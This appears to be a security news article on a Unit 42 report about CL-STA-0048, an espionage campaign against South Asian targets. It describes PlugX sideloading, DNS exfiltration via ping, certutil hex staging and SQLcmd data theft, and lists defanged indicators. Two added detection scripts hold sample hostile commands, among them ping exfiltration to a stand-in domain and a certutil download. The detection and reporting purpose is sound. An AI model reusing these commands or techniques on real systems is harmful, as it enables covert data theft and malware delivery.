
A newly identified cyberespionage campaign, tracked as CL-STA-0048, has been uncovered by Unit 42 researchers targeting high-value organizations in South Asia, including a telecommunications company. The attack demonstrates advanced tactics, techniques, and procedures (TTPs), suggesting a nation-state-backed actor with a strong focus on intelligence gathering.
According to the research, the primary goal of this campaign was to obtain personal information from government employees and exfiltrate sensitive data from targeted organizations.
“These objectives bear the hallmarks of a nation-state advanced persistent threat (APT) espionage operation,” the researchers said.
Unit 42’s moderate-to-high confidence assessment attributes the activity to a Chinese nexus, based on the tools, TTPs, infrastructure, and victimology.
The attackers demonstrated persistence in breaching their targets, systematically probing different internet-facing services until they found a vulnerable entry point.

- Attempt 1: The threat actor first targeted IIS servers, attempting to deploy web shells—but these efforts were blocked by Cortex XDR.
- Attempt 2: After failing with IIS, they shifted focus to Apache Tomcat, attempting to plant a ColdFusion web shell—which was also prevented by Cortex XDR.
- Attempt 3: The attackers finally succeeded in compromising an unpatched MSSQL server, giving them a foothold inside the organization.
“With each failure, the threat actor adapted, targeting the next vulnerable asset in this list.”
Once inside, the attackers escalated their efforts using a combination of PowerShell scripts, privilege escalation tools, and stealthy malware deployment techniques.
The campaign employed two rare but effective exfiltration methods:
1. Exfiltration Over DNS Using the ping Command
Rather than using traditional data theft methods, the attackers formatted stolen data as a series of subdomains and exfiltrated it via DNS queries triggered by ping requests.
“Each ping command triggered a DNS request, transmitting the exfiltrated data to the attackers via DNS.”
This stealthy technique helped bypass network security monitoring tools that primarily focus on HTTP and FTP traffic.
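As an added defensive illustration (not code from the Unit 42 report), the following Python scans process command lines for the ping pattern described above: hex-encoded leftmost labels accumulating under a single parent domain. The command lines and the collector.example domain are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample process command lines (not from the Unit 42 report);
# the hex labels are made-up filler standing in for encoded stolen data.
SAMPLE_CMDLINES = [
    "ping -n 1 4a6f686e20446f65.collector.example",
    "ping -n 1 2b31353535303130.collector.example",
    "C:\\Windows\\System32\\PING.EXE -n 1 31393830303130.collector.example",
    "ping -n 1 fileserver.corp.example",
    "ping www.msftconnecttest.com",
    "whoami /all",
]

# Ten or more hex characters as the leftmost label is unusual for a real host.
HEX_LABEL = re.compile(r"^[0-9a-f]{10,}$", re.IGNORECASE)

def ping_target(cmdline: str):
    """Return the host argument of a ping command line, or None if not ping."""
    tokens = cmdline.split()
    exe = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    if exe not in ("ping", "ping.exe"):
        return None
    # Drop switches (-n, -w, ...) and their numeric values; the host remains.
    rest = [t for t in tokens[1:] if not t.startswith("-") and not t.isdigit()]
    return rest[-1] if rest else None

def decode_hex_label(label: str):
    """Recover the text a hex label encodes for triage, or None if not ASCII."""
    try:
        text = bytes.fromhex(label).decode("ascii")
    except ValueError:
        return None
    return text if text.isprintable() else None

def find_dns_exfil(cmdlines, min_labels: int = 3):
    """Group hex-like leftmost labels by parent domain. A parent domain that
    collects min_labels or more distinct ones matches the ping-exfil pattern."""
    by_parent = defaultdict(set)
    for line in cmdlines:
        host = ping_target(line)
        if not host or "." not in host:
            continue
        first, parent = host.split(".", 1)
        if HEX_LABEL.match(first):
            by_parent[parent.lower()].add(first.lower())
    return {p: sorted(s) for p, s in by_parent.items() if len(s) >= min_labels}
```

The same grouping works on DNS resolver logs (query name instead of command line), which also catches the pattern when the lookups are not triggered by ping.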
2. Using SQLcmd Utility for Data Theft
After gaining access to the MSSQL server, the attackers leveraged SQLcmd to harvest sensitive information and exfiltrate stolen database records.
They specifically targeted:
✅ Government employee records
✅ Client information (phone numbers, addresses, email IDs, birth dates)
✅ Sensitive corporate database contents
By using native SQL tools, the attackers avoided raising red flags that would typically be associated with malware-based data exfiltration.
The PlugX Remote Access Trojan (RAT) played a central role in this attack, serving as a modular backdoor capable of executing additional payloads. The attackers abused the certutil utility to download and execute PlugX from: https://h5.nasa6[.]com/shell/.
To evade detection, they used DLL sideloading techniques, disguising malicious PlugX components as legitimate Adobe Acrobat files:
- Acrobat.exe → Legitimate Adobe binary
- Acrobat.dxe → Encrypted PlugX payload
- Acrobat.dll → PlugX loader
Once executed, PlugX connected to a C2 server (mail.tttseo[.]com) and injected itself into a legitimate system process (svchost.exe) to evade detection.
“The PlugX payload then connected to the C2 server mail.tttseo[.]com, executing in memory as a detection evasion attempt.”
The attackers used a unique “Hex Staging” method to deliver malicious payloads piece by piece.
- Instead of directly writing an executable to disk (which security tools can detect),
- They incrementally wrote hex-encoded data into a temporary file,
- Then used certutil to decode and execute the malware.
“This method bypasses conventional security detection by using native Windows utilities to covertly deliver and execute malicious code.”
This allowed the attackers to deploy additional payloads, including:
✅ Cobalt Strike beacons
✅ SQL scripts for database manipulation
✅ Privilege escalation tools
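Added example, not from the Unit 42 report: a Python check that correlates echo-appended hex chunks with a later certutil decode of the same file (the Hex Staging method above) and also flags certutil used as a downloader, as in the PlugX delivery. The command lines, file paths and URL are constructed.

```python
import re

# Constructed sample process command lines (not from the Unit 42 report); the
# hex chunks are filler, except that "4d5a" is the MZ header of a Windows PE.
SAMPLE_CMDLINES = [
    "cmd.exe /c echo 4d5a90000300000004000000ffff0000 >> C:\\Users\\Public\\stage.tmp",
    "cmd.exe /c echo b8000000000000004000000000000000 >> C:\\Users\\Public\\stage.tmp",
    "cmd.exe /c echo 00000000000000000000000000000000 >> C:\\Users\\Public\\stage.tmp",
    "certutil -decodehex C:\\Users\\Public\\stage.tmp C:\\Users\\Public\\stage.exe",
    "certutil -urlcache -split -f https://files.example/tool.bin C:\\Users\\Public\\tool.bin",
    "cmd.exe /c echo done >> C:\\Users\\Public\\notes.txt",
]

# echo <hex chunk> >> <file>: one staged fragment appended to a file
ECHO_APPEND = re.compile(r"echo\s+([0-9a-f]{8,})\s*>>\s*(\S+)", re.IGNORECASE)
# certutil -decode / -decodehex <in> <out>: the staged file turned into a binary
CERTUTIL_DECODE = re.compile(r"certutil(?:\.exe)?\s.*-decode(?:hex)?\s+(\S+)\s+(\S+)", re.IGNORECASE)
# certutil -urlcache ... <url> <out>: certutil used as a downloader
CERTUTIL_FETCH = re.compile(r"certutil(?:\.exe)?\s.*-urlcache\b.*\s(\S+)\s+(\S+)$", re.IGNORECASE)

def find_hex_staging(cmdlines, min_chunks: int = 2):
    """Correlate echo-appended hex chunks with a later certutil decode of the
    same file, and flag certutil downloads. Returns one finding per event."""
    chunks = {}        # staged file path (lowercased) -> hex chunks in order
    findings = []
    for line in cmdlines:
        m = ECHO_APPEND.search(line)
        if m:
            chunks.setdefault(m.group(2).lower(), []).append(m.group(1).lower())
            continue
        m = CERTUTIL_DECODE.search(line)
        if m:
            src, dst = m.group(1).lower(), m.group(2)
            staged = chunks.get(src, [])
            if len(staged) >= min_chunks:
                findings.append({"type": "hex_staging", "source": src, "output": dst,
                                 "chunks": len(staged),
                                 "pe_header": "".join(staged).startswith("4d5a")})
            continue
        m = CERTUTIL_FETCH.search(line)
        if m:
            findings.append({"type": "certutil_download", "url": m.group(1),
                             "output": m.group(2)})
    return findings
```

A decode with no preceding chunks is not reported, so a legitimate one-off certutil decode does not fire; lower min_chunks or add a file-write telemetry source if the staging happens outside cmd.exe.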
Once inside the network, the attackers focused on gaining administrative access and maintaining long-term persistence.
Privilege Escalation Techniques Used:
🔺 SspiUacBypass – Exploits Windows SSPI to bypass User Account Control (UAC).
🔺 BadPotato & RasmanPotato – Tools from the Potato Suite, used to elevate privileges to SYSTEM-level access.
Command-and-Control Infrastructure:
- SoftEther VPN – A renamed version of the popular VPN tool, abused for stealthy communications.
- Winos4.0 Downloader – A custom-built downloader that connected to 154.201.68[.]57 to fetch payloads.
- Cobalt Strike Deployment – Used for post-exploitation operations, injecting itself into winlogon.exe to maintain stealthy persistence.
“The threat actor deployed Cobalt Strike to execute additional malicious activities within the compromised environment.”
Once inside the database, the attackers attempted to create a privileged database user with the following credentials:
They then deployed a malicious SQL script (1.sql.tmp), which:
✅ Identified and extracted sensitive information (client names, phone numbers, emails).
✅ Aggregated records from multiple databases for large-scale exfiltration.
✅ Used SQLcmd to write stolen data into a text file (C:\users\public\123.txt) for later exfiltration.
“The command groups this data by mobile number and saves the output as a .zip file.”
Unit 42’s investigation strongly suggests ties between CL-STA-0048 and Chinese APT groups:
🔹 Overlaps with DragonRank – Similar PlugX malware variants and C2 infrastructure.
🔹 Use of Chinese DNS Logging Tools – The attackers exfiltrated stolen data via dnslog.pw, a Chinese pen-testing tool.
🔹 KCP Protocol Abuse – The malware leveraged KCP, a low-latency protocol previously used by APT41.
🔹 Supershell C2 Panel – The attackers used Supershell, a command-and-control framework with Mandarin-based documentation.